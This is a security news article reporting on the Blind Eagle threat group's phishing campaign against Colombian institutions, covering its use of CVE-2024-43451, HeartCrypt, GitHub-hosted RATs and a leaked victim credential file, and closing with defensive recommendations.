Blind Eagle Hacks Colombian Institutions Using GitHub, RATs, and Windows NTLM Exploit

A cyber threat group known as Blind Eagle, also tracked under aliases like APT-C-36, AguilaCiega, and APT-Q-98, is actively targeting Colombian government and private organizations. These attacks, running since November 2024, rely on familiar social engineering tactics but with some dangerous new twists—including the use of GitHub-hosted malware, a now-patched NTLM vulnerability, and custom encryption tools.

Researchers at Check Point who analyzed the campaign reported more than 1,600 confirmed victims in just one wave of attacks launched in mid-December 2024. That’s a high hit rate for an advanced persistent threat (APT) that typically favors focused, targeted operations.

Why This Campaign Is So Alarming

Precision Targeting with a Broad Reach

Blind Eagle is known for targeting only specific countries, especially Colombia and sometimes Ecuador. Their phishing emails are tailored to the local language, government agencies, and institutions, making them far more believable and effective.

In this campaign, they successfully breached judicial entities and government networks using emails laced with malicious .URL files. These emails were designed to trick users into clicking links that kick off a multi-stage malware download, often ending with the installation of tools like Remcos RAT.

Fast Exploitation of CVE-2024-43451

One of the most worrying aspects is the speed with which Blind Eagle weaponized a Microsoft Windows vulnerability tracked as CVE-2024-43451. This flaw involved the disclosure of NTLMv2 hashes, which are used for Windows authentication. While it was patched in November 2024, Blind Eagle integrated a variant of the exploit into their campaign just six days later.

The trick? Send users a malicious shortcut file. When clicked, it triggers a WebDAV request, which in some versions of Windows could leak NTLM data or at least confirm that the user opened the file.

Even on patched systems, manually clicking the file still allows malware to be downloaded and executed, proving that user behavior remains the weakest link.

From Phishing to Remote Control: The Full Infection Chain

Email > .URL File > NTLM Ping > RAT Payload

The attack begins with a phishing email containing a malicious link or attachment. Clicking it triggers:

1. A fake request to a server, signaling that the user interacted with the file
2. Download of an encrypted file, protected using a tool called HeartCrypt
3. Execution of the payload, usually a custom-packed variant of PureCrypter
4. Final deployment of RATs such as Remcos, AsyncRAT, NjRAT, or Quasar RAT

Each of these tools allows remote access and control, giving attackers persistent entry into the victim’s system.

GitHub and Bitbucket as Malware Distribution Hubs

Using Trusted Platforms to Hide in Plain Sight

Instead of shady, easily blacklisted domains, Blind Eagle is hosting their malware on GitHub and Bitbucket—platforms typically associated with developers and open-source software.

This method allows them to bypass many corporate firewalls, as these services are widely whitelisted. It also makes it more difficult for automated tools to distinguish malicious files from legitimate ones.

Security researchers noted that the malware files were available in public repositories, sometimes camouflaged under legitimate-looking names.

New Tools and Services: HeartCrypt and PureCrypter

Borrowing from the Cybercrime Marketplace

Blind Eagle has now adopted HeartCrypt, a packer-as-a-service (PaaS). This tool encrypts malicious files to hide their signatures from antivirus tools and endpoint detection systems. In this case, it encrypted a version of PureCrypter, which in turn drops Remcos RAT—a known surveillance tool that’s been linked to numerous cybercrime groups.

Using services like HeartCrypt shows how Blind Eagle is deeply connected to the broader cybercriminal economy, leveraging paid tools to improve their stealth.

GitHub Error Reveals Stolen Passwords and Victim Data

A Mistake Exposes the Attacker’s Backend

In a rare operational slip-up, researchers discovered a GitHub repository tied to Blind Eagle that contained a file listing login credentials for over 1,600 users. The HTML file, called Ver Datos del Formulario.html, included:

• Usernames
• Passwords
• Email addresses
• ATM PINs
• Government agency accounts
• Business and school emails

Although the file was deleted on February 25, 2025, it had already exposed a massive breach of personal and institutional data.

This not only confirmed Blind Eagle’s use of data harvesting, but also revealed their operating time zone—UTC-5—which lines up with Colombia and surrounding regions.

Why This Campaign Is So Effective

Trust, Timing, and Targeting

Blind Eagle’s success stems from a combination of factors:

• Highly targeted phishing emails that mimic real government or judicial communication
• Rapid weaponization of newly disclosed vulnerabilities
• Use of trusted file-sharing services (e.g., Google Drive, Dropbox, GitHub)
• Remote access tools that are easy to customize and hard to detect

Their operations are marked by speed and stealth, and their adoption of PaaS tools like HeartCrypt suggests they are scaling operations with professional-level resources.

What Makes Remcos RAT So Dangerous?

One Tool, Many Capabilities

The Remote Control & Surveillance (Remcos) RAT allows attackers to:

• Log keystrokes
• Record webcam and audio feeds
• Capture screenshots
• Download or delete files
• Control the mouse and keyboard
• Steal saved browser credentials

This level of control gives attackers full visibility into a victim’s activity, and lets them move laterally across networks undetected.

How to Defend Against These Attacks

Actionable Tips for Organizations and Individuals

1. Patch Windows systems immediately, especially for CVE-2024-43451
2. Block outbound WebDAV traffic if not used internally
3. Disable the automatic execution of .URL files
4. Use behavior-based detection tools, not just signature-based AV
5. Watch for suspicious GitHub and Bitbucket file downloads
6. Educate staff on phishing emails tailored to legal or government themes
7. Segment networks to limit lateral movement once a breach occurs

FAQs

Who is Blind Eagle?
Blind Eagle is a threat group active since 2018, focused mainly on targeting Colombian and Ecuadorian organizations through phishing and remote access tools.

What is CVE-2024-43451?
It is a Microsoft Windows vulnerability involving NTLMv2 hash disclosure. Though patched, attackers still exploit user behavior related to the flaw.

How does GitHub play into this campaign?
Blind Eagle hosted malware files on public GitHub repositories to bypass filters and deliver payloads discreetly.

What is HeartCrypt?
A Packer-as-a-Service tool used to encrypt malware files and bypass antivirus detection, often paired with PureCrypter or other loaders.

What kind of data was exposed by the attackers?
Credentials from over 1,600 victims, including government workers, educational staff, and private users in Colombia.

How can I protect my system from such attacks?
Regularly patch software, train users to spot phishing emails, and use advanced endpoint protection that monitors behavior, not just file names.